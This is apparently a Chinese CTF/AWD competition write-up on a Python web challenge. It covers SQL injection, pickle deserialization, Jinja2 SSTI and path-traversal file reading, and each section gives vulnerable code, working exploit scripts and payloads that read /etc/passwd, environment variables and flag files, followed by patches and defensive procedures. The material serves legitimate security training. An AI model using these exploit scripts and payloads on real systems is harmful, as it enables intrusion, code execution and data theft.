AWD攻防赛Python Web漏洞挖掘与防御实战:SQL注入、反序列化、SSTI与文件读取
1. 项目概述:一次典型的AWD攻防赛复盘
最近刚带学生打完一场比赛,复盘时发现“上海市赛/磐石行动2025决赛”中的那道 awd web2-python 赛题很有意思。这道题在决赛圈里卡住了不少人,表面上看是一个常规的Python Web应用,但里面埋了四个需要综合利用的漏洞点,非常考验选手在AWD(Attack With Defense)模式下的快速代码审计、漏洞利用和即时修补能力。很多新手一上手容易被复杂的目录结构绕晕,或者只找到一个注入点就以为万事大吉,结果防守分丢得一塌糊涂。今天我就结合实战,把这四个漏洞的成因、利用方式以及最关键的——如何在比赛那种高压环境下快速、有效地进行防御加固,给大家掰开揉碎了讲清楚。无论你是正在备赛的CTF选手,还是想提升Web安全实战能力的开发者,这篇从攻击者与防守者双视角出发的深度解析,应该都能给你带来不少启发。
这道赛题本质上是一个使用Python框架(常见如Flask或Django)构建的Web应用。在AWD赛中,你通常会拿到一个包含漏洞源代码的靶机环境。你的目标很明确:在攻击其他队伍相同服务的同时,加固自己的服务,防止被其他队伍攻击得分。这要求你必须在极短时间内完成“漏洞挖掘->编写利用脚本->修补自身漏洞”的闭环。下面,我们就直接进入正题,看看这“四兄弟”漏洞到底藏在哪里。
2. 漏洞一:SQL注入与ORM的误用
第一个漏洞是最经典也最容易被发现的SQL注入。但在这个Python Web应用里,它披上了一层“半ORM”的外衣,具有一定的迷惑性。
2.1 漏洞代码定位与成因分析
通常,我们会在处理用户登录、文章查询、用户信息获取的接口里寻找数据库操作。在这个赛题中,漏洞出现在一个用户查询的接口里。关键代码如下(示例为Flask框架):
@app.route('/user/profile')
def get_user_profile():
user_id = request.args.get('id')
# 漏洞点:直接使用字符串拼接构造SQL语句
sql = f"SELECT * FROM users WHERE id = {user_id}"
result = db.engine.execute(sql) # 假设使用SQLAlchemy的engine
user = result.fetchone()
return render_template('profile.html', user=user)
漏洞成因 :开发者直接使用了Python的f-string将用户可控的 user_id 参数拼接到了SQL语句中。即使用户 user_id 参数是数字,攻击者也可以注入其他SQL命令。例如,传入 id=1 OR 1=1 ,最终的SQL语句会变成 SELECT * FROM users WHERE id = 1 OR 1=1 ,导致查询出所有用户信息。
为什么容易漏掉? 有些选手看到项目用了SQLAlchemy这样的ORM框架,就下意识地认为所有数据库操作都是安全的。但实际上,ORM框架如果错误地使用了底层执行接口(如 execute() ),或者用字符串拼接方式构造查询条件,注入风险依然存在。这里就是一个典型:用了SQLAlchemy的 engine.execute() ,但传入的是拼接后的字符串。
2.2 攻击利用与自动化脚本编写
在AWD赛中,手动测试效率太低。我们需要编写自动化的利用脚本。利用目标通常是获取管理员的密码哈希(或明文)、其他队伍的 flag (通常存储在数据库的某个表中)。
利用步骤:
- 判断注入类型 :参数
id为数字型,且错误回显可能直接暴露,属于报错注入。 - 获取数据库结构 :利用
union select查询。- 判断列数:
id=1 order by 5 - 获取表名:
id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() - 获取
flag表或users表的列名。
- 判断列数:
- 窃取关键数据 :直接查询
flag表内容,或查询users表中管理员账号的密码哈希。
Python自动化利用脚本示例:
import requests
import sys
def exploit_sqli(target_url):
# 1. 获取flag表名
payload_table = f"-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- -"
url = f"{target_url}/user/profile?id={payload_table}"
resp = requests.get(url)
# 这里需要根据实际页面回显方式解析出表名,例如从HTML中提取
# 假设返回内容在某个<div>里,这里用正则示例
import re
# 假设表名被包裹在 <div class='data'>...</div> 中
match = re.search(r"<div class='data'>(.*?)</div>", resp.text)
if match:
tables = match.group(1)
print(f"[+] 发现表: {tables}")
if 'flag' in tables:
flag_table = 'flag'
elif 'flags' in tables:
flag_table = 'flags'
else:
# 可能需要遍历所有表
flag_table = tables.split(',')[0]
# 2. 获取flag表字段名
payload_column = f"-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='{flag_table}'-- -"
url = f"{target_url}/user/profile?id={payload_column}"
resp = requests.get(url)
# 解析字段名...
# 3. 读取flag数据
payload_data = f"-1 union select 1,2,group_concat(flag) from {flag_table}-- -"
url = f"{target_url}/user/profile?id={payload_data}"
resp = requests.get(url)
# 解析并打印flag
flag_match = re.search(r"<div class='data'>(.*?)</div>", resp.text)
if flag_match:
flag = flag_match.group(1)
print(f"[+] 成功获取Flag: {flag}")
return flag
return None
if __name__ == '__main__':
target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"
exploit_sqli(target)
注意 :实际比赛中,页面回显方式千奇百怪,可能需要调整正则表达式或解析逻辑。关键在于快速定位数据在响应页面中的位置。
2.3 防御加固方案
作为防守方,我们的修补必须 快速、有效、不影响服务 。切忌在比赛中重构整个数据访问层。
立即修补方案(比赛首选):
- 参数化查询 :将代码中的字符串拼接改为ORM的安全查询或参数化查询。
# 修改后的安全代码(使用SQLAlchemy ORM) from models import User # 假设有User模型 @app.route('/user/profile') def get_user_profile(): user_id = request.args.get('id') # 方法1:使用ORM的filter_by,它是安全的 user = User.query.filter_by(id=user_id).first() # 方法2:如果必须用原始SQL,使用参数化 # sql = "SELECT * FROM users WHERE id = :id" # result = db.session.execute(sql, {'id': user_id}) # user = result.fetchone() return render_template('profile.html', user=user) - 类型强制转换 :如果
id必须是整数,在查询前进行强制转换和验证。try: user_id = int(request.args.get('id', 0)) except ValueError: return "Invalid ID", 400 user = User.query.get(user_id) # get方法根据主键查询,也是安全的 - WAF规则临时加固 :如果修补代码时间紧迫或怕改出问题,可以在Web服务器(如Nginx)层面或应用防火墙(如果有)设置临时规则,拦截包含
union select,information_schema,sleep(等关键字的请求。但这只是权宜之计。
修补后的验证 :修改代码后,务必自己用注入Payload测试一下,确保返回的是错误提示或空结果,而不是数据。同时,要检查网站其他功能是否正常,避免修补引入新Bug。
3. 漏洞二:Python原生反序列化(Pickle)的致命风险
第二个漏洞是Python特有的,也是威力极大的一个——不安全的反序列化。Python的 pickle 模块用于对象序列化,但如果反序列化了不可信的数据,攻击者可以构造恶意数据,在目标服务器上执行任意代码。
3.1 漏洞点发现与原理剖析
这个漏洞通常出现在一些“高级”功能里,比如:
- 会话(Session)处理(如果自定义了Session序列化方式)。
- 缓存数据读取。
- 从网络或用户输入中直接加载数据对象。
在本题中,漏洞可能出现在一个“记住我”或“用户偏好设置”的功能中,服务器将用户配置序列化后存储在Cookie或数据库,之后直接反序列化使用。
漏洞代码示例:
import pickle
import base64
@app.route('/load_prefs')
def load_preferences():
pref_data = request.cookies.get('prefs')
if pref_data:
# 高危操作:直接反序列化来自用户Cookie的数据
user_prefs = pickle.loads(base64.b64decode(pref_data))
return f"Loaded preferences: {user_prefs}"
return "No preferences"
漏洞原理 : pickle.loads() 函数在反序列化数据时,会根据数据内的指令,重建Python对象。攻击者可以精心构造一个序列化字符串,其中包含执行系统命令(如 os.system('cat /flag') )的指令。当服务器反序列化这个数据时,命令就会被执行。
3.2 漏洞利用:构造恶意Pickle对象
利用这个漏洞,我们可以直接获取服务器权限或读取文件。
利用步骤:
- 本地构造一个恶意类,其
__reduce__方法返回一个可执行命令的元组。 - 将这个对象序列化,并做Base64编码。
- 将编码后的字符串作为Cookie中
prefs的值发送给服务器。
Exploit脚本示例:
import pickle
import base64
import os
import requests
class EvilPickle(object):
def __reduce__(self):
# 定义反序列化时执行的命令
# 例如:读取flag文件
cmd = ('cat /flag.txt')
return (os.system, (cmd,))
if __name__ == '__main__':
# 1. 生成恶意序列化数据
evil_obj = EvilPickle()
evil_data = pickle.dumps(evil_obj)
evil_data_b64 = base64.b64encode(evil_data).decode()
print(f"[+] 生成的恶意Payload: {evil_data_b64}")
# 2. 发送请求
target_url = "http://target.com/load_prefs"
headers = {'Cookie': f'prefs={evil_data_b64}'}
resp = requests.get(target_url, headers=headers)
print(resp.text)
# 注意:os.system命令的输出可能直接返回给客户端,也可能需要其他方式接收(如反弹shell,或写入web目录)。
更隐蔽的利用方式 :如果命令执行没有回显,可以构造Payload将命令结果写入Web目录下的一个文件,然后通过HTTP访问该文件。
# 修改__reduce__中的命令
cmd = ('cat /flag.txt > /var/www/html/static/leak.txt')
3.3 防御策略与安全替代方案
这个漏洞的修补同样需要快速有效。
立即修补方案:
- 绝对禁止反序列化不可信数据 :这是铁律。找到
pickle.loads()或cPickle.loads()的调用点。 - 替换为安全的数据格式 :将存储用户配置的格式从Pickle改为JSON。
import json @app.route('/load_prefs') def load_preferences(): pref_data = request.cookies.get('prefs') if pref_data: try: # 使用json.loads替代pickle.loads user_prefs = json.loads(base64.b64decode(pref_data).decode()) except (json.JSONDecodeError, UnicodeDecodeError): user_prefs = {} return f"Loaded preferences: {user_prefs}" return "No preferences" - 签名验证 :如果因历史原因必须使用Pickle,可以考虑对序列化数据进行HMAC签名,在反序列化前验证数据的完整性和来源。但在AWD分秒必争的环境下,改为JSON是更稳妥快捷的选择。
修补验证 :修补后,使用之前的Exploit脚本进行测试,应该看到命令没有执行,服务器可能返回400错误或空结果。同时检查相关功能(如加载用户设置)是否仍能正常工作。
4. 漏洞三:服务端模板注入(SSTI)
第三个漏洞是服务端模板注入(SSTI)。这在Python的Web框架(如Jinja2、Mako、Tornado模板)中一旦出现,危害极大,可以直接导致远程代码执行(RCE)。
4.1 漏洞触发场景与判断
SSTI常出现在将用户输入直接拼接到模板字符串中进行渲染的地方。例如,一个“自定义欢迎信息”或“错误页面渲染”功能。
漏洞代码示例(Jinja2):
from flask import render_template_string, request
@app.route('/greet')
def greet_user():
name = request.args.get('name', 'Guest')
# 漏洞点:直接使用用户输入的name渲染模板
template = f"<h1>Hello, {name}!</h1>"
return render_template_string(template)
如何判断存在SSTI? 输入简单的运算表达式或特殊语法进行探测:
- 输入
{{ 7*7 }},如果页面返回49,则很可能存在Jinja2 SSTI。 - 输入
${7*7}(针对某些模板引擎)。 - 输入
<%= 7*7 %>。
4.2 利用链构造与RCE实现
一旦确认SSTI,下一步就是构造利用链,目标是执行系统命令。不同模板引擎的利用方式不同,以最常见的Jinja2为例。
Jinja2 SSTI利用步骤:
- 探测可用类和方法 :通过Python对象的继承链(
__class__,__mro__,__subclasses__())来寻找可以用于执行命令的类,如os._wrap_close、subprocess.Popen。 - 构造Payload :通过一系列属性访问,最终调用
popen或system方法。
一个经典的Jinja2 RCE Payload:
{{ ''.__class__.__mro__[1].__subclasses__()[XXX].__init__.__globals__['os'].popen('cat /flag').read() }}
其中 XXX 需要替换为具体的索引号,这个索引号指向 subprocess.Popen 类。索引号在不同Python环境中可能不同,需要爆破或通过脚本查找。
自动化利用脚本示例:
import requests
import re
def find_popen_index(target_url, param):
# 先获取所有子类的列表(部分)
payload = "{{ ''.__class__.__mro__[1].__subclasses__() }}"
url = f"{target_url}/greet?{param}={payload}"
resp = requests.get(url)
# 从响应中提取列表文本,并查找‘Popen’的位置
# 这里需要根据实际回显调整解析逻辑
# 假设返回是文本格式的列表表示
content = resp.text
# 简单演示:手动分析后,假设发现索引是258
# 实际比赛中需要写更健壮的解析逻辑或暴力尝试常见索引
common_indexes = [132, 133, 258, 259, 287, 288] # 一些常见环境中的Popen索引
for idx in common_indexes:
test_payload = f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{idx}].__init__.__globals__['os'].popen('id').read() }}}}"
test_url = f"{target_url}/greet?{param}={test_payload}"
test_resp = requests.get(test_url)
if 'uid=' in test_resp.text:
print(f"[+] 找到Popen索引: {idx}")
return idx
return None
def exploit_ssti(target_url, param, cmd):
idx = find_popen_index(target_url, param)
if idx is None:
print("[-] 未能自动找到可利用的索引,请手动探测。")
return
payload = f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{idx}].__init__.__globals__['os'].popen('{cmd}').read() }}}}"
final_url = f"{target_url}/greet?{param}={payload}"
resp = requests.get(final_url)
# 提取命令执行结果
print(resp.text)
if __name__ == '__main__':
target = "http://target.com"
exploit_ssti(target, 'name', 'cat /flag.txt')
4.3 修补方案:严格的输入过滤与沙箱环境
修补SSTI的核心原则是: 永远不要让用户控制模板内容 。
立即修补方案:
- 避免使用
render_template_string:除非绝对必要,否则不要动态生成模板字符串。如果功能需要,应使用固定的模板文件,并将用户输入作为 变量 传入。
在# 安全做法 @app.route('/greet') def greet_user(): name = request.args.get('name', 'Guest') # 使用预定义的模板文件,name作为变量传递 return render_template('greet.html', name=name)greet.html中:<h1>Hello, {{ name }}!</h1>这样,name变量会被Jinja2自动转义(如果开启自动转义),即使输入包含{{}},也只会被当作普通文本显示。 - 如果必须动态渲染,进行严格过滤 :对用户输入进行强过滤,移除或转义所有模板语法关键字,如
{,},$,<%,%>等。但这种方法容易漏,不推荐。 - 使用沙箱环境 :Jinja2提供了沙箱环境,可以限制可用的函数和属性。但在AWD比赛中,配置沙箱可能比较复杂,不是首选。
修补验证 :修补后,尝试输入 {{ 7*7 }} ,页面上应该显示为文本 {{ 7*7 }} ,而不是计算结果 49 。同时,尝试之前的RCE Payload,应该没有任何命令执行效果。
5. 漏洞四:任意文件读取与路径遍历
第四个漏洞是任意文件读取,常由路径遍历(Path Traversal)引起。攻击者通过操纵文件路径参数,读取服务器上的敏感文件,如 /etc/passwd 、源代码、配置文件、甚至 flag 文件。
5.1 漏洞代码模式识别
这种漏洞常出现在文件下载、图片查看、静态资源代理等功能中。
漏洞代码示例:
@app.route('/static/file')
def serve_file():
filename = request.args.get('f')
# 漏洞点:未对filename进行路径净化,直接拼接
file_path = os.path.join('/var/www/static/', filename)
if os.path.isfile(file_path):
return send_file(file_path)
else:
return "File not found", 404
漏洞原理 : os.path.join 在遇到以斜杠开头的参数时,行为可能不符合预期。例如,当 filename 为 ../../../etc/passwd 时, os.path.join('/var/www/static/', '../../../etc/passwd') 的结果是 /etc/passwd ,成功跳出了静态文件目录。
5.2 利用方法:读取系统关键文件
利用方式非常直接,就是通过 ../ 来向上级目录遍历。
常见利用Payload:
f=../../../etc/passwd:读取系统用户列表。f=../../../../proc/self/environ:读取当前进程环境变量,可能包含密钥。f=../../../../flag或f=../../../../home/ctf/flag.txt:尝试读取比赛Flag文件。f=../../../../app/app.py:读取应用源代码,为进一步审计找漏洞。
自动化探测脚本:
import requests
def check_file_read(target_url, param):
common_files = [
'../../../etc/passwd',
'../../../../proc/self/environ',
'../../../../flag',
'../../../../home/ctf/flag',
'../../../../app/app.py',
'../../../../config.py',
'....//....//....//etc/passwd', # 双写绕过可能
]
for f in common_files:
url = f"{target_url}/static/file?{param}={f}"
resp = requests.get(url)
if resp.status_code == 200 and len(resp.content) > 0:
# 简单判断是否成功,根据内容特征进一步判断
if 'root:' in resp.text or 'FLAG{' in resp.text or 'from flask import' in resp.text:
print(f"[+] 成功读取文件: {f}")
print(resp.text[:500]) # 打印前500字符
return True
print("[-] 未发现可读的敏感文件。")
return False
if __name__ == '__main__':
target = "http://target.com"
check_file_read(target, 'f')
5.3 防御加固:路径规范化与白名单校验
修补的关键在于将用户输入的文件名“锁定”在预期的目录内。
立即修补方案:
- 使用
os.path.normpath和绝对路径校验 :对拼接后的完整路径进行规范化,并检查其是否仍在允许的根目录之下。import os from flask import abort @app.route('/static/file') def serve_file(): filename = request.args.get('f') # 定义允许的根目录 STATIC_ROOT = '/var/www/static' # 拼接路径 file_path = os.path.join(STATIC_ROOT, filename) # 规范化路径,消除`../` normalized_path = os.path.normpath(file_path) # 最关键的一步:检查规范化后的路径是否仍然以根目录开头 if not normalized_path.startswith(os.path.abspath(STATIC_ROOT) + os.sep): abort(403) # 禁止访问 if os.path.isfile(normalized_path): return send_file(normalized_path) else: return "File not found", 404 - 白名单机制 :如果可能,只允许访问已知的、安全的文件列表。例如,从数据库读取允许的文件名,而不是直接从参数获取。
- 文件名过滤 :过滤掉所有包含
..、/、\等路径分隔符的输入。但这种方法可能被双写等绕过方式干扰,不如路径校验可靠。
修补验证 :修补后,尝试之前的Payload,如 ../../../etc/passwd ,应该收到403错误或“File not found”,而不是文件内容。同时,正常的静态文件访问(如 f=image.jpg )应不受影响。
6. AWD实战中的综合策略与应急响应
分析了四个独立漏洞,但在真实的AWD比赛中,它们往往是联动的,并且防守方需要在攻击的同时,进行快速有效的应急响应。
6.1 攻击阶段的联动利用思路
一个成熟的攻击者不会只打一个点。例如:
- 利用SSTI或反序列化拿到Shell :这是最直接的方式,可以获取服务器权限。
- 如果RCE被拦截或修补,转向文件读取 :尝试读取
/proc/self/cmdline获取进程启动命令,读取/etc/passwd和/home/*/.bash_history寻找线索,最重要的是直接读取Web目录下的源代码(app.py,models.py,config.py),进行本地审计,寻找其他漏洞(如SQL注入)。 - 通过SQL注入获取信息 :如果文件读取也受限,SQL注入可以用来拖取数据库中的用户表、配置表,可能找到后台密码、加密的Flag或者其他敏感信息。
- 信息组合 :从文件读取到的数据库配置,可能用于尝试连接数据库;从SQL注入获取到的密码哈希,可能用于撞库或登录后台。
攻击脚本也应该是联动的。一个基本的攻击流程脚本会依次尝试SSTI、反序列化、文件读取、SQL注入,哪个通了就用哪个。
6.2 防守阶段的应急响应流程
防守是AWD得分稳定的关键。修补漏洞要快,但更要稳。
- 第一步:快速定位漏洞文件 。拿到源码后,立即使用
grep -r命令搜索危险函数:grep -r "pickle.loads\|render_template_string\|os\.system\|exec\|eval\|os\.popen" ./ grep -r "execute(\|query(\|f\"" ./ | grep -v ".pyc" # 查找可能的SQL拼接 grep -r "send_file\|open(" ./ | grep -v ".pyc" # 查找文件操作 - 第二步:优先修补高危漏洞 。RCE(SSTI、反序列化)> 文件读取 > SQL注入。因为RCE可能导致服务器被完全控制,丢分最快。
- 第三步:使用“最小化修改”原则 。不要重构代码,只做最必要的安全加固。例如,SQL注入就改为参数化查询,SSTI就改为使用模板文件传参。改的代码越少,引入新Bug的风险越低。
- 第四步:立即验证 。修补后,第一时间用自己写的攻击脚本测试自己的服务,确保漏洞已修复,且正常功能不受影响。
- 第五步:监控与日志 。修改代码时,可以增加简单的日志记录,记录异常的访问请求(如包含
../、union select的请求)。虽然比赛时间短,但有助于发现攻击行为。 - 第六步:备份与回滚 。在修改关键文件前,先进行备份。如果修补后服务崩溃,要能迅速回滚到上一个可用的版本。在比赛中,服务不可用也会持续丢分。
6.3 常见问题与排查技巧实录
在实战中,总会遇到一些意想不到的问题。
问题1:修补后服务崩溃或功能异常。
- 排查 :首先检查语法错误。在AWD环境中,修改后最好能重启一下服务(如果允许)。如果重启后还是报错,检查修改是否影响了其他依赖该函数的地方。例如,你把一个全局的
pickle.loads改成了json.loads,但其他地方传入的数据可能不是JSON格式。 - 技巧 :使用
try...except包裹你的修改,并记录日志到文件,可以快速定位错误。try: user_prefs = json.loads(data) except Exception as e: with open('/tmp/error.log', 'a') as f: f.write(str(e)) user_prefs = {}
问题2:攻击脚本在其他队伍靶机上不生效。
- 排查 :可能原因有:1) 对方已经修补;2) 路径或参数名不对;3) 过滤规则不同(如WAF);4) Python版本或库版本不同导致利用链失效(特别是SSTI的类索引)。
- 技巧 :准备多种Payload变体。对于SSTI,准备多个常见的类索引进行爆破。对于文件读取,尝试不同的路径深度(
../../、../../../)和文件名(flag、flag.txt、/flag)。
问题3:自己的服务不断被攻击,但不知道漏洞在哪。
- 排查 :如果已经修补了已知漏洞,但还在丢分,说明可能有隐藏漏洞。立即重新审计代码,重点看:
- 二次反序列化(一个数据被反序列化两次)。
- 不安全的反射(
getattr,__import__)。 - 命令执行的拼接(
os.system(f"echo {input}"))。 - 其他不常见的模板引擎。
- 技巧 :在本地搭建完全相同的环境,用其他队伍的IP攻击自己,同时使用
strace或tcpdump监控进程行为,看攻击触发了哪段代码。
问题4:Flag提交频繁失败或延迟。
- 技巧 :编写Flag提交脚本时,要加入重试机制和异常处理。网络波动在比赛中很常见。同时,监控自己的Flag是否被其他队伍窃取,这可能是存在未发现的漏洞(如信息泄露)的信号。
AWD比赛就像一场高强度的网络安全实战演习,比拼的不仅是技术深度,更是反应速度、心理素质和团队协作。把这四个漏洞吃透,建立起“攻击-防御-监控”的闭环思维,你就能在未来的比赛中更加游刃有余。
更多推荐
所有评论(0)